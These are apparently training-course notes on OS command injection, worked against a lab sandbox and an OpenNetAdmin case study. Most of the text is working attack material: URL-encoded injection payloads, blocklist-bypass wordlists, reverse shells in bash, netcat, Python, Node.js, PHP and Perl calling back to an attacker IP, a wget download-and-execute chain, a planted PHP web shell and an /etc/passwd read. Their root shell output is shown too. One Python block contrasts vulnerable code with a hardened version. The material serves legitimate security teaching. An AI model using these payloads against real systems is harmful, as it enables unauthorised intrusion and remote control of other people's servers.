Module 13: Command Injection
Discovery of Command Injection
Accessing the Command Injection Sandbox
Start the VPN and the VM, then add the sandbox IP to your hosts file.
Familiarizing Ourselves with the Sandbox

First command injection payload
http://ci-sandbox:80/python/index.py?ip=127.0.0.1|id

Where is Command Injection Most Common?
Vulnerable Code Snippet
<?php
$IP = $_GET['IP'];          // attacker-controlled value, never validated
echo "<pre>";
system("ping -c 5 ".$IP);   // concatenated straight into the shell command line
echo "</pre>";
?>
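The same handler written two ways in Python, as an added example that is not part of the module: the concatenation pattern of the PHP snippet above, next to a hardened version that allowlist-validates the address and executes an argv list with no shell. `echo` stands in for `ping -c 5` so the block runs offline; the payload string is constructed.

```python
import ipaddress
import subprocess


def run_unsafe(user_ip: str) -> str:
    """Same pattern as the PHP snippet: the parameter is concatenated into a
    shell command line, so ';', '|', '&&' and $(...) in it are interpreted.
    'echo' stands in for 'ping -c 5' so the block runs offline."""
    return subprocess.run("echo " + user_ip, shell=True,
                          capture_output=True, text=True).stdout


def validate_ip(user_ip: str) -> str:
    """Allowlist check: the value must parse as an IPv4 or IPv6 address.
    This also blocks option injection such as a value starting with '-'."""
    try:
        return str(ipaddress.ip_address(user_ip.strip()))
    except ValueError:
        raise ValueError(f"rejected non-IP value: {user_ip!r}") from None


def run_safe(user_ip: str) -> str:
    """Hardened handler: validate, then exec with an argv list and no shell,
    so the parameter is never parsed as part of a command line."""
    ip = validate_ip(user_ip)
    return subprocess.run(["echo", ip], capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "127.0.0.1;echo INJECTED"        # constructed ';' chaining payload
    print("unsafe:", repr(run_unsafe(payload)))  # both commands ran
    try:
        run_safe(payload)
    except ValueError as exc:
        print("safe:", exc)                      # rejected before any exec
    print("safe:", repr(run_safe("127.0.0.1")))
```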
About the Chaining of Commands & System Calls
Executing a single command
kali@kali:~$ ls -ls
total 32
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Desktop
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Documents
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Downloads
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Music
4 drwxr-xr-x 2 kali kali 4096 Aug 23 07:12 Pictures
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Public
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Templates
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Videos
Chaining our first commands
kali@kali:~$ ls -ls ; id
total 32
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Desktop
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Documents
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Downloads
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Music
4 drwxr-xr-x 2 kali kali 4096 Aug 23 07:12 Pictures
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Public
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Templates
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Videos
uid=1000(kali) gid=1000(kali) groups=1000(kali),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),120(wireshark),134(scanner),142(kaboxer)
Chaining with Logical AND (Success)
kali@kali:~$ whoami && hostname
kali
kali
Chaining with Logical AND (Failure)
kali@kali:~$ foobar && hostname
foobar: command not found
Chaining with Logical OR (Failure)
kali@kali:~$ whoami || id
kali
Chaining with Logical OR (Success)
kali@kali:~$ foobar || whoami
foobar: command not found
kali
Inline Execution Characters
`cmd`
$(cmd)
Chaining with inline execution
kali@kali:~$ echo "This is an echo statement"
This is an echo statement
kali@kali:~$ echo "This is an `whoami` echo statement"
This is an kali echo statement
kali@kali:~$ echo "This is an $(whoami) echo statement"
This is an kali echo statement
Dealing with Common Protections
Typical Input Normalization - Sending Clean Payloads
Starting a Netcat Listener on port 9090
kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...
Our Wrapped Payload with No URL Encoding
http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'

Our Encoded Payload result
bash+-c+'bash+-i+>%26+/dev/tcp/192.168.49.51/9090+0>%261'
Our Wrapped Payload with URL Encoding (ready to be sent)
kali@kali:~$ curl "http://ci-sandbox/nodejs/index.js?ip=127.0.0.1|bash+-c+'bash+-i+>%26+/dev/tcp/192.168.49.51/9090+0>%261'"
The above could have just been sent in Burp Suite's Repeater after URL-encoding the request...
Receiving a root privileged shell
...
listening on [any] 9090 ...
connect to [172.16.80.2] from (UNKNOWN) [172.16.80.1] 59993
bash: cannot set terminal process group (19): Inappropriate ioctl for device
bash: no job control in this shell
root@cdee2640ffbf:/#
Typical Input Sanitization - Blocklisted Strings Bypass

A null statement, $(), expands to nothing, so it can be inserted between any characters of a command name: a substring blocklist no longer sees the command, but the shell still runs it.
Null Statement Injection into our previous command injection
kali@kali:~$ wh$()oami
kali

A short wordlist to work with wfuzz
bogus
;id
|id
`id`
i$()d
;i$()d
|i$()d
FAIL||i$()d
&&id
&id
FAIL_INTENT|id
FAIL_INTENT||id
`sleep 5`
`sleep 10`
`id`
$(sleep 5)
$(sleep 10)
$(id)
;`echo 'aWQK' |base64 -d`
FAIL_INTENT|`echo 'aWQK' |base64 -d`
FAIL_INTENT||`echo 'aWQK' |base64 -d`
Fuzzing with our Custom Wordlist
kali@kali:~$ wfuzz -c -z file,/home/kali/command_injection_custom.txt --hc 404 http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ
Total requests: 21
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000003: 200 68 L 124 W 1156 Ch "|id"
000000015: 200 68 L 124 W 1156 Ch "`id`"
000000018: 200 68 L 124 W 1156 Ch "$(id)"
000000001: 200 68 L 117 W 1113 Ch "bogus"
000000012: 200 68 L 124 W 1156 Ch "FAIL_INTENT||id"
000000011: 200 68 L 124 W 1156 Ch "FAIL_INTENT|id"
000000008: 200 69 L 120 W 1167 Ch "FAIL||i$()d"
000000005: 200 68 L 117 W 1113 Ch "i$()d"
000000002: 200 68 L 124 W 1156 Ch ";id"
000000017: 200 68 L 124 W 1156 Ch "$(sleep 10)"
000000014: 200 68 L 124 W 1156 Ch "`sleep 10`"
000000004: 200 68 L 124 W 1156 Ch "`id`"
000000020: 200 69 L 120 W 1167 Ch "FAIL_INTENT|`echo 'aWQK' |base64 -d`"
000000021: 200 69 L 120 W 1167 Ch "FAIL_INTENT||`echo 'aWQK' |base64 -d`"
000000016: 200 68 L 124 W 1156 Ch "$(sleep 5)"
000000013: 200 68 L 124 W 1156 Ch "`sleep 5`"
000000007: 200 69 L 120 W 1167 Ch "|i$()d"
000000019: 200 79 L 187 W 1647 Ch ";`echo 'aWQK' |base64 -d`"
000000009: 200 78 L 184 W 1593 Ch "&&id"
000000006: 200 79 L 187 W 1647 Ch ";i$()d"
000000010: 200 78 L 184 W 1593 Ch "&id"
Total time: 0
Processed Requests: 21
Filtered Requests: 0
Requests/sec.: 0
Fuzzing with our Custom Wordlist, hiding responses of 1156 bytes (the size returned for blocked payloads)
kali@kali:~$ wfuzz -c -z file,/home/kali/command_injection_custom.txt --hc 404 --hh 1156 http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ
Total requests: 21
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 68 L 117 W 1113 Ch "bogus"
000000005: 200 68 L 117 W 1113 Ch "i$()d"
000000008: 200 69 L 120 W 1167 Ch "FAIL||i$()d"
000000020: 200 69 L 120 W 1167 Ch "FAIL_INTENT|`echo 'aWQK' |base64 -d`"
000000021: 200 69 L 120 W 1167 Ch "FAIL_INTENT||`echo 'aWQK' |base64 -d`"
000000010: 200 78 L 184 W 1593 Ch "&id"
000000009: 200 78 L 184 W 1593 Ch "&&id"
000000007: 200 69 L 120 W 1167 Ch "|i$()d"
000000006: 200 79 L 187 W 1647 Ch ";i$()d"
000000019: 200 79 L 187 W 1647 Ch ";`echo 'aWQK' |base64 -d`"
Total time: 0
Processed Requests: 21
Filtered Requests: 11
Requests/sec.: 0

Encoding our payload with Base64
kali@kali:~$ echo "cat /etc/passwd" |base64
Y2F0IC9ldGMvcGFzc3dkCg==
Our Full and Complete Payload
http://ci-sandbox/php/blocklisted.php?ip=127.0.0.1;`echo%20%22Y2F0IC9ldGMvcGFzc3dkCg==%22%20|base64%20-d`

Blind OS Command Injection Bypass
Attempting to execute the `id` command with blind command injection
http://ci-sandbox:80/php/blind.php?ip=127.0.0.1;id

Capturing the initial time
kali@kali:~$ time curl http://ci-sandbox:80/php/blind.php?ip=127.0.0.1
<html>
<head>
<link rel="stylesheet" href="../css/bootstrap.min.css">
<style type="text/css">
body{
background-color: #121212;
}
.check{
background-color: #1f1f1f;
border-radius: 4px;
padding-top: 34px;
width: 600px;
height: 150px;
align-self: center;
box-shadow: 5px 5px 5px #0f0f0f;
}
.online{
color: #00ff4c;
}
.offline{
color: #ff0000;
}
.noParam{
color: #FFFFFF;
}
</style>
</head>
<body>
<center>
<div class="check" align="center">
<pre>
<h3 class='offline'>[ - ] Host is DOWN </h3> </pre>
</div>
<img src="logo.png"/>
</center>
</body>
</html>
real 0m10.014s
Bypassing blind sanitization with sleep for execution verification
kali@kali:~$ time curl "http://ci-sandbox:80/php/blind.php?ip=127.0.0.1;sleep%2020"
<html>
<head>
<link rel="stylesheet" href="../css/bootstrap.min.css">
<style type="text/css">
body{
background-color: #121212;
}
.check{
background-color: #1f1f1f;
border-radius: 4px;
padding-top: 34px;
width: 600px;
height: 150px;
align-self: center;
box-shadow: 5px 5px 5px #0f0f0f;
}
.online{
color: #00ff4c;
}
.offline{
color: #ff0000;
}
.noParam{
color: #FFFFFF;
}
</style>
</head>
<body>
<center>
<div class="check" align="center">
<pre>
<h3 class='offline'>[ - ] Host is DOWN </h3> </pre>
</div>
<img src="logo.png"/>
</center>
</body>
</html>
real 0m30.002s
Extra Mile
Do the lab.
Enumeration and Exploitation
Enumerating Command Injection Capabilities
Common Linux Capability Checks
Command     Used For
wget        File Transfer
curl        File Transfer
fetch       File Transfer
gcc         Compilation
cc          Compilation
nc          Shells, File Transfer, Port Forwarding
socat       Shells, File Transfer, Port Forwarding
ping        Networking, Code Execution Verification
netstat     Networking
ss          Networking
ifconfig    Networking
ip          Networking
hostname    Networking
php         Shells, Code Execution
python      Shells, Code Execution
python3     Shells, Code Execution
perl        Shells, Code Execution
java        Shells, Code Execution
Common Windows Capability Checks
Capability      Used For
Powershell      Code Execution, Enumeration, Movement, Payload Delivery
Visual Basic    Code Execution, Enumeration, Movement, Payload Delivery
tftp            File Transfer
ftp             File Transfer
certutil        File Transfer
Python          Code Execution, Enumeration
.NET            Code Execution, Privilege Escalation, Payload Delivery
ipconfig        Networking
netstat         Networking
hostname        Networking
systeminfo      System Information, Patches, Versioning, Arch, etc.
Custom Linux Capability Wordlist
w00tw00t
wget
curl
fetch
gcc
cc
nc
socat
ping
netstat
ss
ifconfig
ip
hostname
php
python
python3
perl
java
Fuzzing and checking for capabilities with our Custom Wordlist
kali@kali:~$ wfuzz -c -z file,/home/kali/capability_checks_custom.txt --hc 404 "http://ci-sandbox:80/php/index.php?ip=127.0.0.1;which FUZZ"
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://ci-sandbox:80/php/index.php?ip=127.0.0.1;which%20FUZZ
Total requests: 19
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000006: 200 11 L 69 W 503 Ch "cc"
000000015: 200 11 L 69 W 510 Ch "php"
000000018: 200 11 L 69 W 505 Ch "perl"
000000017: 200 11 L 69 W 508 Ch "python3"
000000001: 200 10 L 68 W 491 Ch "w00tw00t"
000000014: 200 11 L 69 W 506 Ch "hostname"
000000019: 200 10 L 68 W 491 Ch "java"
000000007: 200 11 L 69 W 499 Ch "nc"
000000016: 200 11 L 69 W 508 Ch "python"
000000003: 200 11 L 69 W 505 Ch "curl"
000000012: 200 11 L 69 W 506 Ch "ifconfig"
000000011: 200 10 L 68 W 491 Ch "ss"
000000010: 200 11 L 69 W 504 Ch "netstat"
000000013: 200 10 L 68 W 491 Ch "ip"
000000009: 200 11 L 69 W 502 Ch "ping"
000000004: 200 10 L 68 W 492 Ch "fetch"
000000005: 200 11 L 69 W 505 Ch "gcc"
000000008: 200 10 L 68 W 492 Ch "socat"
000000002: 200 11 L 69 W 506 Ch "wget"
Total time: 0
Processed Requests: 19
Filtered Requests: 0
Requests/sec.: 0
Enumerated capabilities
cc
gcc
php
perl
python
python3
hostname
nc
netstat
curl
wget
ping
ifconfig
Obtaining a Shell - Netcat
Starting a Netcat listener
nc -nlvp 9090

Endpoint for our command injection
http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|/bin/nc%20-nv%20192.168.49.51%209090%20-e%20/bin/bash
A root shell with netcat
kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 51321
whoami
root
Obtaining a Shell - Python
Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.51",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Unfolded Python Payload
import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.49.51",9090))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Starting a Netcat Listener on port 9090
kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...
Full endpoint with payload in the command injection sandbox
http://ci-sandbox/php/index.php?ip=127.0.0.1;python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.49.51%22,9090));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
Receiving the reverse shell
...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 51809
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
Obtaining a Shell - Node.js
Chained Node.js Reverse Shell
echo "require('child_process').exec('nc -nv 192.168.49.51 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js
The Full Command Injection Endpoint
http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|echo "require('child_process').exec('nc -nv 192.168.49.51 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js
The full URL-encoded command injection endpoint
http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|echo%20%22require(%27child_process%27).exec(%27nc%20-nv%20192.168.49.51%209090%20-e%20%2Fbin%2Fbash%27)%22%20%3E%20%2Fvar%2Ftmp%2Foffsec.js%20%3B%20node%20%2Fvar%2Ftmp%2Foffsec.js
Starting a Netcat listener on port 9090
kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...
Receiving our reverse shell
...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 52319
whoami
root
Obtaining a Shell - PHP
PHP Reverse Shell Examples
php -r '$sock=fsockopen("192.168.49.51",9090);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
The first half of our PHP Payloads
php -r '$sock=fsockopen("192.168.49.51",9090);
Various PHP Execution Options
exec("/bin/sh -i <&3 >&3 2>&3");'
shell_exec("/bin/sh -i <&3 >&3 2>&3");'
system("/bin/sh -i <&3 >&3 2>&3");'
passthru("/bin/sh -i <&3 >&3 2>&3");'
popen("/bin/sh -i <&3 >&3 2>&3", "r");'

Starting a netcat listener on port 9090
kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...
Unencoded endpoint (including our payload)
http://ci-sandbox/php/index.php?ip=127.0.0.1;php -r "system(\"bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'\");"
Complete endpoint (including our payload)
http://ci-sandbox/php/index.php?ip=127.0.0.1;php%20-r%20%22system(%5C%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.49.51%2F9090%200%3E%261%27%5C%22)%3B%22
Receiving the reverse shell
...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 53017
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@5bce60aa9510:/var/www/html/php$
Obtaining a Shell - Perl
Perl Reverse Shell
perl -e 'use Socket;$i="192.168.49.51";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl Reverse Shell Unfolded
use Socket;
$i="192.168.49.51";
$p=9090;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))) {
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
}
Full URL Encoded Endpoint
http://ci-sandbox/nodejs/index.js?ip=127.0.0.1|perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.49.51%22%3B%24p%3D9090%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27
Starting a netcat listener on port 9090
kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...
Receiving the reverse shell
...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 53590
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
#
File Transfer

Placing the nc binary in our Apache2 web root
kali@kali:~$ sudo cp /bin/nc /var/www/html/
[sudo] password for kali:
kali@kali:~$
Starting the Apache2 Service
kali@kali:~$ sudo service apache2 start
The full payload (unencoded)
wget http://192.168.49.51:80/nc -O /var/tmp/nc ; chmod 755 /var/tmp/nc ; /var/tmp/nc -nv 192.168.49.51 9090 -e /bin/bash
The full payload (encoded)
wget%20http://192.168.49.51:80/nc%20-O%20/var/tmp/nc%20;%20chmod%20755%20/var/tmp/nc%20;%20/var/tmp/nc%20-nv%20192.168.49.51%209090%20-e%20/bin/bash
Starting a netcat listener on port 9090
kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...
Receiving the reverse shell
...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 60052
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Extra Mile I
Transfer a different payload, change its file permissions so it can execute, and run it to obtain a reverse shell.
Writing a Web Shell
Finding our present working directory
http://ci-sandbox:80/php/index.php?ip=127.0.0.1;pwd

Using echo to write out our own webshell
echo+"<pre><?php+passthru(\$_GET['cmd']);+?></pre>"+>+/var/www/html/webshell.php
Writing our own webshell
http://ci-sandbox:80/php/index.php?ip=127.0.0.1;echo+%22%3Cpre%3E%3C?php+passthru(\$_GET[%27cmd%27]);+?%3E%3C/pre%3E%22+%3E+/var/www/html/webshell.php

Extra Mile II
Case Study - OpenNetAdmin (ONA)
Accessing OpenNetAdmin
Start the VPN, VM, and add the IP to your hosts file.
Discovery and Assessment

Exploitation

Full POST Data Payload attempting command injection
xajax=window_submit&xajaxr=1632763728103&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E172.24.0.2;id&xajaxargs[]=ping